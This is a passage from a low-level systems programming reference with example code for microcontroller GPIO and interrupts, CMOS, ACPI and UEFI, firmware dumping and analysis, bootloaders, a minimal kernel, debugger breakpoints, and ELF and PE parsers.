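    uint32_t code;         /* cause code (mcause without the top bit) */
} mcause_t;

static mcause_t decode_mcause_rv32(uint32_t mcause)
{
    mcause_t c;
    c.is_interrupt = (int)(mcause >> 31);
    c.code = mcause & 0x7FFFFFFFu;
    return c;
}

/* Name a few standard causes; anything else is reported as "other". */
static const char *mcause_name(mcause_t c)
{
    assert(c.is_interrupt == 0 || c.is_interrupt == 1);
    if (c.is_interrupt) {
        switch (c.code) {
        case 3:  return "machine software interrupt";
        case 7:  return "machine timer interrupt";
        case 11: return "machine external interrupt";
        default: return "other interrupt";
        }
    }
    switch (c.code) {
    case 2:  return "illegal instruction";
    case 11: return "environment call from M-mode";
    default: return "other exception";
    }
}
```

On RV64 the interrupt flag sits in bit 63 instead, so the shift and mask would need to follow the register width.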
CSR Instructions
CSRRW rd, csr, rs1 ; atomic read/write
CSRRS rd, csr, rs1 ; atomic read/set bits
CSRRC rd, csr, rs1 ; atomic read/clear bits
CSRRWI rd, csr, imm ; read/write immediate
CSRRSI rd, csr, imm ; read/set immediate
CSRRCI rd, csr, imm ; read/clear immediate
RV32E for Embedded
- 16 registers (x0-x15)
- Reduced area
- Same ISA otherwise
Example: Blink LED
# GPIO base address
.equ GPIO_BASE, 0x10012000
.equ GPIO_OUT, 0x00
.equ GPIO_DIR, 0x04
.section .text
.globl _start
_start:
# Set up stack
la sp, _stack_top
# Configure GPIO
li t0, GPIO_BASE
# Set pin 5 as output
li t1, (1 << 5)
sw t1, GPIO_DIR(t0)
loop:
# Turn LED on
sw t1, GPIO_OUT(t0)
# Delay
li a0, 100000
call delay
# Turn LED off
sw zero, GPIO_OUT(t0)
# Delay
li a0, 100000
call delay
j loop
delay:
# Count in t2: the caller keeps the GPIO base in t0 and the pin mask in t1
li t2, 0
1:
addi t2, t2, 1
blt t2, a0, 1b
ret
AVR Architecture
- 8-bit RISC
- 32 8-bit registers (R0-R31)
- Some registers have special functions:
- R26-R27: X pointer
- R28-R29: Y pointer
- R30-R31: Z pointer
Basic Instructions
; Data transfer
LDI R16, 0xFF ; load immediate
MOV R0, R1 ; copy register
LD R0, X ; load indirect
ST X, R0 ; store indirect
; Arithmetic
ADD R0, R1 ; add
SUB R0, R1 ; subtract
INC R0 ; increment
DEC R0 ; decrement
; Logic
AND R0, R1 ; and
OR R0, R1 ; or
EOR R0, R1 ; xor
COM R0 ; complement
; Branch
RJMP label ; relative jump
RCALL label ; relative call
RET ; return
BRNE label ; branch if not equal
Example: Blink LED
; ATmega328P (Arduino Uno)
.equ DDRB, 0x04
.equ PORTB, 0x05
.org 0
rjmp main
main:
; Set pin 5 as output
ldi r16, (1 << 5)
out DDRB, r16
loop:
; Turn LED on
sbi PORTB, 5
; Delay
ldi r18, 100
call delay
; Turn LED off
cbi PORTB, 5
; Delay
ldi r18, 100
call delay
rjmp loop
delay:
ldi r16, 255
1: ldi r17, 255
2: dec r17
brne 2b
dec r16
brne 1b
dec r18
brne delay
ret
ARM Cortex-M microcontrollers.
STM32F4 Example
@ STM32F4 Discovery - Blink LED
@ (GNU as treats ';' as a statement separator on ARM, so comments use '@')
.syntax unified
.cpu cortex-m4
.thumb
.equ RCC_AHB1ENR, 0x40023830
.equ GPIOD_MODER, 0x40020C00
.equ GPIOD_ODR, 0x40020C14
.section .text
.global _start
_start:
@ Enable GPIOD clock
ldr r0, =RCC_AHB1ENR
ldr r1, [r0]
orr r1, r1, #(1 << 3) @ bit 3 for GPIOD
str r1, [r0]
@ Configure PD12 as output
ldr r0, =GPIOD_MODER
ldr r1, [r0]
bic r1, r1, #(3 << 24) @ clear bits 24-25 (PD12)
orr r1, r1, #(1 << 24) @ set to output (01)
str r1, [r0]
loop:
@ LED on
ldr r0, =GPIOD_ODR
ldr r1, [r0]
orr r1, r1, #(1 << 12) @ set PD12 high
str r1, [r0]
@ Delay
ldr r2, =1000000
1: subs r2, r2, #1
bne 1b
@ LED off
ldr r0, =GPIOD_ODR
ldr r1, [r0]
bic r1, r1, #(1 << 12) @ set PD12 low
str r1, [r0]
@ Delay
ldr r2, =1000000
2: subs r2, r2, #1
bne 2b
b loop
.section .stack
.space 1024
_stack_top:
Peripherals controlled via memory addresses.
GPIO Registers
; Typical GPIO register layout
struc gpio_regs
.moder resd 1 ; mode register
.otyper resd 1 ; output type
.ospeedr resd 1 ; output speed
.pupdr resd 1 ; pull-up/down
.idr resd 1 ; input data
.odr resd 1 ; output data
.bsrr resd 1 ; bit set/reset
.lckr resd 1 ; lock
.afrl resd 1 ; alternate function low
.afrh resd 1 ; alternate function high
endstruc
; Set pin as output
mov eax, [gpio_base + gpio_regs.moder]
and eax, ~(3 << (pin*2)) ; clear mode bits
or eax, (1 << (pin*2)) ; set to output
mov [gpio_base + gpio_regs.moder], eax
; Write to pin
mov eax, 1 << pin
mov [gpio_base + gpio_regs.bsrr], eax ; set: bits 0-15 drive the pin high
shl eax, 16
mov [gpio_base + gpio_regs.bsrr], eax ; reset: bits 16-31 drive the pin low
Input Configuration
; Configure pin as input with pull-up
; Clear mode bits (00 = input)
mov eax, [gpio_base + gpio_regs.moder]
and eax, ~(3 << (pin*2))
mov [gpio_base + gpio_regs.moder], eax
; Configure pull-up
mov eax, [gpio_base + gpio_regs.pupdr]
and eax, ~(3 << (pin*2))
or eax, (1 << (pin*2)) ; 01 = pull-up
mov [gpio_base + gpio_regs.pupdr], eax
; Read input
mov eax, [gpio_base + gpio_regs.idr]
shr eax, pin
and eax, 1 ; get pin value
Interrupt on Pin Change
; Enable EXTI interrupt on pin
; Configure SYSCFG to route GPIO to EXTI
mov eax, [SYSCFG_EXTICR + (pin/4)*4]
and eax, ~(0xF << ((pin%4)*4))
or eax, (port << ((pin%4)*4))
mov [SYSCFG_EXTICR + (pin/4)*4], eax
; Configure EXTI
mov eax, 1 << pin
mov [EXTI_IMR], eax ; unmask interrupt
mov [EXTI_RTSR], eax ; rising edge trigger
; Set interrupt priority
mov byte [NVIC_IPR(EXTI_IRQn)], 0
; Enable interrupt in NVIC
mov eax, 1 << EXTI_IRQn
mov [NVIC_ISER], eax
NVIC (Nested Vectored Interrupt Controller)
; Set interrupt priority
; Each NVIC_IPR register holds four 8-bit priority fields
; (STM32F4 implements only the upper 4 bits of each field)
mov r0, #EXTI0_IRQn
lsr r1, r0, #2 ; which IPR register
lsl r0, r0, #3 ; 8 bits per interrupt
and r0, r0, #0x1F ; bit position within the register
mov r2, #0x80 ; priority (128)
lsl r2, r2, r0
ldr r3, =NVIC_IPR_BASE
str r2, [r3, r1, lsl #2] ; note: overwrites the other three fields in this register
; Enable interrupt
mov r0, #EXTI0_IRQn
lsr r1, r0, #5 ; which ISER register
and r0, r0, #0x1F ; bit in register
mov r2, #1
lsl r2, r2, r0
ldr r3, =NVIC_ISER_BASE
str r2, [r3, r1, lsl #2]
Interrupt Handler
; EXTI0 interrupt handler
EXTI0_IRQHandler:
push {r0-r3, lr}
; Check if EXTI0 triggered
ldr r0, =EXTI_PR
ldr r1, [r0]
tst r1, #1
beq .done
; Clear pending bit (write 1 to bit 0 only, so other pending lines are left alone)
mov r1, #1
str r1, [r0]
; Handle interrupt
bl handle_button_press
.done:
pop {r0-r3, pc}
CMOS memory stores system configuration.
CMOS Access
; Read CMOS register
; AL = register number
read_cmos:
out 0x70, al ; select register
in al, 0x71 ; read data
ret
; Write CMOS register
; AL = register number, AH = data
write_cmos:
out 0x70, al
mov al, ah
out 0x71, al
ret
Common CMOS Registers
0x00: Seconds
0x02: Minutes
0x04: Hours
0x07: Day of month
0x08: Month
0x09: Year
0x0A: Status register A
0x0B: Status register B
0x0C: Status register C
0x0D: Status register D
0x10: Floppy drive type
0x12: Hard disk type
0x14: Equipment list
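The time and date registers are normally stored in BCD (binary-coded decimal), with bit 2 of status register B selecting binary mode instead. The sketch below shows the conversion a driver would apply after reading a register. The function names and the `RTC_STATUS_B_BINARY` macro name are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

#define RTC_STATUS_B_BINARY 0x04 /* status register B, bit 2: 1 = binary, 0 = BCD */

/* Convert one packed BCD byte (two decimal digits) to its binary value. */
static uint8_t bcd_to_binary(uint8_t bcd)
{
    assert((bcd & 0x0F) <= 9 && (bcd >> 4) <= 9); /* both nibbles must be digits */
    return (uint8_t)((bcd >> 4) * 10 + (bcd & 0x0F));
}

/* Decode a raw time/date register according to the mode in status register B. */
static uint8_t rtc_decode(uint8_t raw, uint8_t status_b)
{
    return (status_b & RTC_STATUS_B_BINARY) ? raw : bcd_to_binary(raw);
}
```

For example, a seconds register reading 0x59 in BCD mode means 59 seconds, not 89.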
Advanced Configuration and Power Interface.
ACPI Tables
RSDP (Root System Description Pointer)
- Signature "RSD PTR "
- Checksum
- OEM ID
- RSDT address
RSDT (Root System Description Table)
- Pointers to other tables
- FADT, MADT, SSDT, etc.
FADT (Fixed ACPI Description Table)
- Power management info
- DSDT address
- SCI interrupt
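The checksum field in the RSDP is what separates a real table from a stray "RSD PTR " string in memory: the first 20 bytes of the structure must sum to zero modulo 256. A hedged sketch of that validation, working on a raw byte pointer, is shown below. The function names are hypothetical, and only the 20-byte ACPI 1.0 portion of the structure is checked.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define RSDP_V1_LENGTH 20 /* signature[8] + checksum + OEM ID[6] + revision + RSDT address[4] */

/* Return 1 if the bytes at rsdp carry the signature and a valid checksum. */
static int rsdp_valid(const uint8_t *rsdp)
{
    assert(rsdp != NULL);
    if (memcmp(rsdp, "RSD PTR ", 8) != 0)
        return 0;
    uint8_t sum = 0;
    for (size_t i = 0; i < RSDP_V1_LENGTH; i++)
        sum = (uint8_t)(sum + rsdp[i]);
    return sum == 0;
}

/* The 32-bit RSDT address is stored little-endian at offset 16. */
static uint32_t rsdp_rsdt_address(const uint8_t *rsdp)
{
    return (uint32_t)rsdp[16] | ((uint32_t)rsdp[17] << 8) |
           ((uint32_t)rsdp[18] << 16) | ((uint32_t)rsdp[19] << 24);
}
```

A search routine would call `rsdp_valid` on every 16-byte-aligned candidate and only then trust the RSDT address.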
Finding ACPI Tables
; Search for RSDP in BIOS memory
find_rsdp:
mov esi, 0xE0000 ; start of BIOS area
.search_loop:
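cmp dword [esi], 'RSD ' ; first half of "RSD PTR "
jne .next
cmp dword [esi+4], 'PTR ' ; second half of "RSD PTR "
je .found
.next:
add esi, 16 ; the signature always sits on a 16-byte boundary
cmp esi, 0x100000
jb .search_loop ; unsigned compare, since these are addresses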
xor eax, eax ; not found
ret
.found:
mov eax, esi
ret
UEFI Runtime Services
// Get variable
EFI_STATUS GetVariable(
CHAR16 *VariableName,
EFI_GUID *VendorGuid,
UINT32 *Attributes,
UINTN *DataSize,
VOID *Data
);
// Set variable
EFI_STATUS SetVariable(
CHAR16 *VariableName,
EFI_GUID *VendorGuid,
UINT32 Attributes,
UINTN DataSize,
VOID *Data
);
// Get time
EFI_STATUS GetTime(
EFI_TIME *Time,
EFI_TIME_CAPABILITIES *Capabilities
);
UEFI Protocols
// Simple File System Protocol
struct EFI_SIMPLE_FILE_SYSTEM_PROTOCOL {
UINT64 Revision;
EFI_OPEN_VOLUME OpenVolume;
};
// Get file system handle
EFI_SIMPLE_FILE_SYSTEM_PROTOCOL *FileSystem;
status = BS->HandleProtocol(
DeviceHandle,
&gEfiSimpleFileSystemProtocolGuid,
(VOID**)&FileSystem
);
// Open volume
EFI_FILE_PROTOCOL *Root;
status = FileSystem->OpenVolume(FileSystem, &Root);
Extracting Firmware
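# Dump BIOS from Linux (needs root; "internal" selects the mainboard's own flash programmer)
flashrom -p internal -r bios.bin
# UEFI variables (not the firmware image itself) are exposed under
# /sys/firmware/efi/efivars/; the full image has to be read
# from the flash chip
Analyzing Firmware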
# Check strings
strings bios.bin | grep -i "copyright\|version\|model"
# Check entropy
binwalk -E bios.bin
# Extract components
binwalk -e bios.bin
Common Firmware Structures
UEFI Firmware Volume:
- Volume header
- File system
- FFS files (PE/COFF images)
BIOS:
- POST code
- Runtime services
- ACPI tables
- VGA BIOS option ROMs
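When a dump is analyzed by hand, firmware volumes can be located by their header signature: the four bytes "_FVH" sit 40 bytes into the volume header, after the 16-byte zero vector, the 16-byte file system GUID and the 8-byte volume length. The following is a minimal scanning sketch under that layout. The function name `find_firmware_volume` and the `FV_NOT_FOUND` sentinel are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define FV_SIGNATURE_OFFSET 40            /* ZeroVector[16] + FileSystemGuid[16] + FvLength[8] */
#define FV_NOT_FOUND ((size_t)-1)

/*
 * Return the offset of the first firmware volume header at or after
 * `start`, or FV_NOT_FOUND if the image contains no further signature.
 */
static size_t find_firmware_volume(const uint8_t *image, size_t len, size_t start)
{
    assert(image != NULL);
    for (size_t hdr = start; hdr + FV_SIGNATURE_OFFSET + 4 <= len; hdr++) {
        if (memcmp(image + hdr + FV_SIGNATURE_OFFSET, "_FVH", 4) == 0)
            return hdr; /* the header begins 40 bytes before the signature */
    }
    return FV_NOT_FOUND;
}
```

Calling the function repeatedly with `start` set just past the previous hit walks all volumes in the image. A byte-by-byte scan is slow but makes no assumption about volume alignment.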
Finding Entry Points
; Look for BIOS entry point
; Usually at F000:FFF0 (reset vector)
; Contains far jump to POST code
; UEFI SEC/PEI phase entry
; Look for specific GUIDs in firmware volume
Stage 1 Bootloader
; boot1.asm - First stage bootloader
[org 0x7C00]
[bits 16]
start:
; Set up segments
xor ax, ax
mov ds, ax
mov es, ax
mov ss, ax
mov sp, 0x7C00
; Save boot drive
mov [boot_drive], dl
; Print message
mov si, msg_boot1
call print_string
; Load second stage
mov si, msg_loading
call print_string
mov ah, 0x02 ; read sectors
mov al, 0x20 ; sectors to read
mov ch, 0 ; cylinder
mov cl, 2 ; sector
mov dh, 0 ; head
mov dl, [boot_drive]
mov bx, 0x1000 ; buffer segment
mov es, bx
xor bx, bx
int 0x13
jc disk_error
; Jump to second stage
jmp 0x1000:0x0000
disk_error:
mov si, msg_error
call print_string
jmp $
print_string:
lodsb
or al, al
jz .done
mov ah, 0x0E
int 0x10
jmp print_string
.done:
ret
boot_drive db 0
msg_boot1 db "TinyOS Bootloader Stage 1", 13, 10, 0
msg_loading db "Loading Stage 2...", 13, 10, 0
msg_error db "Disk error!", 13, 10, 0
times 510-($-$$) db 0
dw 0xAA55
Stage 2 Bootloader
; boot2.asm - Second stage bootloader
[org 0x0000]
[bits 16]
start:
; Set up segments
mov ax, cs
mov ds, ax
mov es, ax
mov ss, ax
mov sp, 0xFFFE ; keep the stack word-aligned
; Save boot drive (stage 1 leaves it in DL)
mov [boot_drive], dl
; Print message
mov si, msg_boot2
call print_string
; Enable A20 line
call enable_a20
; Load kernel
mov si, msg_load_kernel
call print_string
; Load kernel from disk
mov ah, 0x02
mov al, 0x40 ; 64 sectors (32KB)
mov ch, 0
mov cl, 0x22 ; after boot sectors
mov dh, 0
mov dl, [boot_drive]
mov bx, 0x2000 ; kernel segment
mov es, bx
xor bx, bx
int 0x13
jc disk_error
; Switch to protected mode
call switch_to_pm
; Should never return
jmp $
enable_a20:
in al, 0x92
or al, 2
out 0x92, al
ret
; ... print_string, disk_error as before ...
%include "gdt.inc"
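switch_to_pm:
cli
lgdt [gdt_desc] ; gdt_desc must hold the linear address 0x10000 + gdt_start
mov eax, cr0
or eax, 1
mov cr0, eax
; Stage 2 runs in segment 0x1000, so its linear base is 0x10000
jmp dword 0x08:(0x10000 + pm_start)
[bits 32]
pm_start:
mov ax, 0x10
mov ds, ax
mov es, ax
mov fs, ax
mov gs, ax
mov ss, ax
mov esp, 0x90000
; Copy the kernel from its load address (0x2000:0x0000 = 0x20000)
; to the address it is linked at (0x200000)
cld
mov esi, 0x20000
mov edi, 0x200000
mov ecx, (64 * 512) / 4
rep movsd
; Jump to kernel through the flat code segment
jmp 0x08:0x200000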
boot_drive db 0
msg_boot2 db "TinyOS Bootloader Stage 2", 13, 10, 0
msg_load_kernel db "Loading kernel...", 13, 10, 0
Minimal Kernel
// kernel.c - Minimal kernel
void kernel_main(void) {
// VGA text mode buffer (volatile: these writes are memory-mapped I/O)
volatile char *video = (volatile char*)0xB8000;
const char *message = "Hello from TinyOS Kernel!";
// Clear screen
for (int i = 0; i < 80 * 25 * 2; i += 2) {
video[i] = ' ';
video[i + 1] = 0x07;
}
// Print message
int i = 0;
while (message[i]) {
video[i * 2] = message[i];
video[i * 2 + 1] = 0x0A; // green
i++;
}
// Hang
while (1) {
__asm__("hlt");
}
}
Linker Script
/* kernel.ld */
OUTPUT_FORMAT(elf32-i386)
ENTRY(kernel_main)
SECTIONS
{
. = 0x200000;
.text : {
*(.text)
*(.text.*)
}
.data : {
*(.data)
*(.data.*)
}
.bss : {
*(.bss)
*(.bss.*)
}
/DISCARD/ : {
*(.comment)
*(.eh_frame)
}
}
Simple Page Allocator
// memory.c - Physical memory manager
#include <stddef.h>
#include <stdint.h>
#define PAGE_SIZE 4096
#define PAGE_COUNT (1024 * 1024) // 4GB / 4KB
// End of the kernel image; assumed to be exported by the linker script
extern char _kernel_end;
// Bitmap convention: bit set = page free, bit clear = page used
static uint32_t page_bitmap[PAGE_COUNT / 32];
void init_memory(uint32_t memory_size) {
    // Mark all pages as used initially
    for (int i = 0; i < PAGE_COUNT / 32; i++) {
        page_bitmap[i] = 0;
    }
    // Free every page between the end of the kernel and the end of RAM.
    // Everything below stays reserved: page 0, the bootloader,
    // and the kernel itself at 0x200000.
    uint32_t first_free = ((uint32_t)(uintptr_t)&_kernel_end + PAGE_SIZE - 1) / PAGE_SIZE;
    uint32_t page_limit = memory_size / PAGE_SIZE;
    for (uint32_t pfn = first_free; pfn < page_limit; pfn++) {
        page_bitmap[pfn / 32] |= 1u << (pfn % 32);
    }
}
void* alloc_page(void) {
    for (int i = 0; i < PAGE_COUNT / 32; i++) {
        if (page_bitmap[i] != 0) {
            // Find first free (set) bit
            int bit = __builtin_ctz(page_bitmap[i]);
            page_bitmap[i] &= ~(1u << bit);
            return (void*)(uintptr_t)(((uint32_t)i * 32 + bit) * PAGE_SIZE);
        }
    }
    return NULL; // Out of memory
}
void free_page(void* page) {
    uint32_t pfn = (uint32_t)(uintptr_t)page / PAGE_SIZE;
    uint32_t index = pfn / 32;
    uint32_t bit = pfn % 32;
    page_bitmap[index] |= (1u << bit);
}
Round-Robin Scheduler
// scheduler.c
#define MAX_TASKS 64
#define STACK_SIZE 4096
typedef struct {
uint32_t esp;
uint32_t ebp;
uint32_t eip;
uint32_t state; // 0 = free, 1 = ready, 2 = running
uint8_t stack[STACK_SIZE];
} task_t;
static task_t tasks[MAX_TASKS];
static int current_task = -1;
static int next_task = 0;
void scheduler_init(void) {
for (int i = 0; i < MAX_TASKS; i++) {
tasks[i].state = 0; // free
}
}
int create_task(void (*entry)(void)) {
// Find free task slot
int i;
for (i = 0; i < MAX_TASKS; i++) {
if (tasks[i].state == 0) break;
}
if (i == MAX_TASKS) return -1;
// Initialize stack
uint32_t *stack = (uint32_t*)(tasks[i].stack + STACK_SIZE - 4);
// Set up initial context (for context switch); the register order mirrors PUSHAD
*--stack = (uint32_t)entry; // EIP
*--stack = 0x202; // EFLAGS (interrupts enabled, reserved bit 1 set)
*--stack = 0; // EAX
*--stack = 0; // ECX
*--stack = 0; // EDX
*--stack = 0; // EBX
*--stack = 0; // ESP (unused)
*--stack = 0; // EBP (0 marks the end of the frame chain)
*--stack = 0; // ESI
*--stack = 0; // EDI
tasks[i].esp = (uint32_t)stack;
tasks[i].state = 1; // ready
return i;
}
// Called by timer interrupt
void schedule(void) {
if (current_task != -1) {
// Save current task state
__asm__ volatile(
"mov %%esp, %0\n"
"mov %%ebp, %1\n"
: "=r"(tasks[current_task].esp),
"=r"(tasks[current_task].ebp)
);
tasks[current_task].state = 1;
}
// Find next ready task
int found = 0;
for (int i = 0; i < MAX_TASKS; i++) {
next_task = (next_task + 1) % MAX_TASKS;
if (tasks[next_task].state == 1) {
found = 1;
break;
}
}
if (!found) {
// No tasks, just return
return;
}
// Switch to next task
current_task = next_task;
tasks[current_task].state = 2;
// Restore task state
__asm__ volatile(
"mov %0, %%esp\n"
"mov %1, %%ebp\n"
:
: "r"(tasks[current_task].esp),
"r"(tasks[current_task].ebp)
);
}
Software Breakpoints (INT3)
// Set software breakpoint
void set_breakpoint(pid_t pid, void *addr) {
// Save original instruction
unsigned char original;
read_process_memory(pid, addr, &original, 1);
// Write INT3 (0xCC)
unsigned char int3 = 0xCC;
write_process_memory(pid, addr, &int3, 1);
// Store original for later
breakpoint *bp = malloc(sizeof(breakpoint));
bp->addr = addr;
bp->original = original;
// Add to breakpoint list
}
// Handle breakpoint hit
void handle_breakpoint(pid_t pid) {
    // Get register context
    struct user_regs_struct regs;
    ptrace(PTRACE_GETREGS, pid, NULL, &regs);
    // RIP points to the next instruction after INT3
    void *bp_addr = (void*)(regs.rip - 1);
    // Restore original instruction
    breakpoint *bp = find_breakpoint(bp_addr);
    write_process_memory(pid, bp_addr, &bp->original, 1);
    // Rewind RIP so the restored instruction is the one that executes
    regs.rip -= 1;
    ptrace(PTRACE_SETREGS, pid, NULL, &regs);
    // Single-step to execute original instruction
    ptrace(PTRACE_SINGLESTEP, pid, NULL, NULL);
    waitpid(pid, NULL, 0);
    // Re-insert breakpoint
    unsigned char int3 = 0xCC;
    write_process_memory(pid, bp_addr, &int3, 1);
    // Continue execution
    ptrace(PTRACE_CONT, pid, NULL, NULL);
}
Hardware Breakpoints
; Set hardware breakpoint via debug registers
set_hw_breakpoint:
; DR0 = breakpoint address
mov rax, [breakpoint_addr]
mov dr0, rax
; DR7 = enable breakpoint 0, type = execution
; L0 (bit 0) = 1
; R/W0 (bits 16-17) = 00 (execution)
; LEN0 (bits 18-19) = 00 (1 byte, required for execution breakpoints)
mov rax, 0x1
mov dr7, rax
ret
Reading Registers with ptrace
void print_registers(pid_t pid) {
struct user_regs_struct regs;
if (ptrace(PTRACE_GETREGS, pid, NULL, &regs) == -1) {
perror("ptrace GETREGS");
return;
}
printf("RAX: 0x%016llx\n", regs.rax);
printf("RBX: 0x%016llx\n", regs.rbx);
printf("RCX: 0x%016llx\n", regs.rcx);
printf("RDX: 0x%016llx\n", regs.rdx);
printf("RSI: 0x%016llx\n", regs.rsi);
printf("RDI: 0x%016llx\n", regs.rdi);
printf("RBP: 0x%016llx\n", regs.rbp);
printf("RSP: 0x%016llx\n", regs.rsp);
printf("RIP: 0x%016llx\n", regs.rip);
printf("EFLAGS: 0x%08llx\n", regs.eflags);
}
Simple Disassembler
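// Simple x86-64 disassembler for a few common one-byte opcodes
#include <stdint.h>
#include <stdio.h>
#include <string.h>
typedef struct {
    char mnemonic[16];
    char operands[64];
} instruction_t;
// Register names indexed by the low three bits of the opcode
static const char *const reg64[8] = {
    "rax", "rcx", "rdx", "rbx", "rsp", "rbp", "rsi", "rdi"
};
static const char *const reg32[8] = {
    "eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"
};
instruction_t disassemble(const unsigned char *code, size_t *size) {
    instruction_t inst = {0};
    unsigned char opcode = code[0];
    uint32_t imm32;
    switch (opcode) {
    case 0x90:
        strcpy(inst.mnemonic, "nop");
        *size = 1;
        break;
    case 0xC3:
        strcpy(inst.mnemonic, "ret");
        *size = 1;
        break;
    case 0xCC:
        strcpy(inst.mnemonic, "int3");
        *size = 1;
        break;
    case 0x50 ... 0x57: // push r64 (case ranges are a GCC/Clang extension)
        strcpy(inst.mnemonic, "push");
        strcpy(inst.operands, reg64[opcode - 0x50]);
        *size = 1;
        break;
    case 0x58 ... 0x5F: // pop r64
        strcpy(inst.mnemonic, "pop");
        strcpy(inst.operands, reg64[opcode - 0x58]);
        *size = 1;
        break;
    case 0xB8 ... 0xBF: // mov r32, imm32
        strcpy(inst.mnemonic, "mov");
        memcpy(&imm32, code + 1, sizeof imm32); // avoids an unaligned read
        snprintf(inst.operands, sizeof inst.operands, "%s, 0x%x",
                 reg32[opcode - 0xB8], imm32);
        *size = 5;
        break;
    default: // unknown opcode: emit it as a raw data byte
        strcpy(inst.mnemonic, "db");
        snprintf(inst.operands, sizeof inst.operands, "0x%02x", opcode);
        *size = 1;
    }
    return inst;
}
// elf_parser.c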
#include <stdio.h>
#include <stdlib.h>
#include <elf.h>
typedef struct {
FILE *fp;
Elf64_Ehdr ehdr;
Elf64_Phdr *phdr;
Elf64_Shdr *shdr;
char *shstrtab;
} elf_file_t;
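elf_file_t* elf_open(const char *filename) {
// calloc zeroes the struct, so elf_close never frees an uninitialized pointer
elf_file_t *elf = calloc(1, sizeof(elf_file_t));
if (!elf) return NULL;
elf->fp = fopen(filename, "rb");
if (!elf->fp) {
free(elf);
return NULL;
}
// Read ELF header
if (fread(&elf->ehdr, sizeof(Elf64_Ehdr), 1, elf->fp) != 1) {
fclose(elf->fp);
free(elf);
return NULL;
}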
// Verify ELF magic
if (elf->ehdr.e_ident[EI_MAG0] != ELFMAG0 ||
elf->ehdr.e_ident[EI_MAG1] != ELFMAG1 ||
elf->ehdr.e_ident[EI_MAG2] != ELFMAG2 ||
elf->ehdr.e_ident[EI_MAG3] != ELFMAG3) {
fclose(elf->fp);
free(elf);
return NULL;
}
// Read program headers
elf->phdr = malloc(elf->ehdr.e_phnum * sizeof(Elf64_Phdr));
fseek(elf->fp, elf->ehdr.e_phoff, SEEK_SET);
fread(elf->phdr, sizeof(Elf64_Phdr), elf->ehdr.e_phnum, elf->fp);
// Read section headers
elf->shdr = malloc(elf->ehdr.e_shnum * sizeof(Elf64_Shdr));
fseek(elf->fp, elf->ehdr.e_shoff, SEEK_SET);
fread(elf->shdr, sizeof(Elf64_Shdr), elf->ehdr.e_shnum, elf->fp);
// Read section header string table
if (elf->ehdr.e_shstrndx != SHN_UNDEF) {
Elf64_Shdr *shstr = &elf->shdr[elf->ehdr.e_shstrndx];
elf->shstrtab = malloc(shstr->sh_size);
fseek(elf->fp, shstr->sh_offset, SEEK_SET);
fread(elf->shstrtab, 1, shstr->sh_size, elf->fp);
}
return elf;
}
void elf_print_info(elf_file_t *elf) {
printf("ELF Type: ");
switch (elf->ehdr.e_type) {
case ET_REL: printf("REL (Relocatable)\n"); break;
case ET_EXEC: printf("EXEC (Executable)\n"); break;
case ET_DYN: printf("DYN (Shared object)\n"); break;
default: printf("Unknown\n");
}
printf("Entry point: 0x%lx\n", elf->ehdr.e_entry);
printf("Program headers: %d\n", elf->ehdr.e_phnum);
printf("Section headers: %d\n", elf->ehdr.e_shnum);
// Print program headers
for (int i = 0; i < elf->ehdr.e_phnum; i++) {
Elf64_Phdr *p = &elf->phdr[i];
printf("PHDR %d: type=%d vaddr=0x%lx memsz=%ld\n",
i, p->p_type, p->p_vaddr, p->p_memsz);
}
// Print sections
for (int i = 0; i < elf->ehdr.e_shnum; i++) {
Elf64_Shdr *s = &elf->shdr[i];
char *name = elf->shstrtab + s->sh_name;
printf("SEC %d: %-12s addr=0x%lx size=%ld\n",
i, name, s->sh_addr, s->sh_size);
}
}
void elf_close(elf_file_t *elf) {
fclose(elf->fp);
free(elf->phdr);
free(elf->shdr);
if (elf->shstrtab) free(elf->shstrtab);
free(elf);
}
// pe_parser.c
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
typedef struct {
FILE *fp;
IMAGE_DOS_HEADER dos_header;
IMAGE_NT_HEADERS nt_headers;
IMAGE_SECTION_HEADER *sections;
} pe_file_t;
pe_file_t* pe_open(const char *filename) {
pe_file_t *pe = malloc(sizeof(pe_file_t));
pe->fp = fopen(filename, "rb");
if (!pe->fp) {
free(pe);
return NULL;
}
// Read DOS header
fread(&pe->dos_header, sizeof(IMAGE_DOS_HEADER), 1, pe->fp);
// Verify DOS magic
if (pe->dos_header.e_magic != IMAGE_DOS_SIGNATURE) {
fclose(pe->fp);
free(pe);
return NULL;
}
// Seek to NT headers
fseek(pe->fp, pe->dos_header.e_lfanew, SEEK_SET);
// Read NT headers
fread(&pe->nt_headers, sizeof(IMAGE_NT_HEADERS), 1, pe->fp);
// Verify PE signature
if (pe->nt_headers.Signature != IMAGE_NT_SIGNATURE) {
fclose(pe->fp);
free(pe);
return NULL;
}
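// Read section headers. They start right after the optional header, whose
// real size is FileHeader.SizeOfOptionalHeader, not sizeof(IMAGE_OPTIONAL_HEADER)
int num_sections = pe->nt_headers.FileHeader.NumberOfSections;
fseek(pe->fp, pe->dos_header.e_lfanew + sizeof(DWORD) + sizeof(IMAGE_FILE_HEADER)
+ pe->nt_headers.FileHeader.SizeOfOptionalHeader, SEEK_SET);
pe->sections = malloc(num_sections * sizeof(IMAGE_SECTION_HEADER));
fread(pe->sections, sizeof(IMAGE_SECTION_HEADER),
num_sections, pe->fp);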
return pe;
}
void pe_print_info(pe_file_t *pe) {
IMAGE_FILE_HEADER *file = &pe->nt_headers.FileHeader;
IMAGE_OPTIONAL_HEADER *opt = &pe->nt_headers.OptionalHeader;
printf("Machine: 0x%04x\n", file->Machine);
printf("Sections: %d\n", file->NumberOfSections);
printf("Entry point: 0x%08x\n", opt->AddressOfEntryPoint);
printf("Image base: 0x%016llx\n", opt->ImageBase);
// Print sections
for (int i = 0; i < file->NumberOfSections; i++) {
IMAGE_SECTION_HEADER *s = &pe->sections[i];
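// Name is 8 bytes and not NUL-terminated when all 8 are used, so cap it with %.8s
printf("SEC %d: %-8.8s vaddr=0x%08x size=%u\n",
i, (const char*)s->Name, (unsigned)s->VirtualAddress, (unsigned)s->SizeOfRawData);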
}
}
void pe_close(pe_file_t *pe) {
fclose(pe->fp);
free(pe->sections);
free(pe);
}
    // Natural-width read-only data fields
    EXIT_QUALIFICATION = 0x6400,
    IO_RCX = 0x6402,
    IO_RSI = 0x6404,
    IO_RDI = 0x6406,
    IO_RIP = 0x6408,
    GUEST_LINEAR_ADDRESS = 0x640A,
    // Natural-width guest-state fields
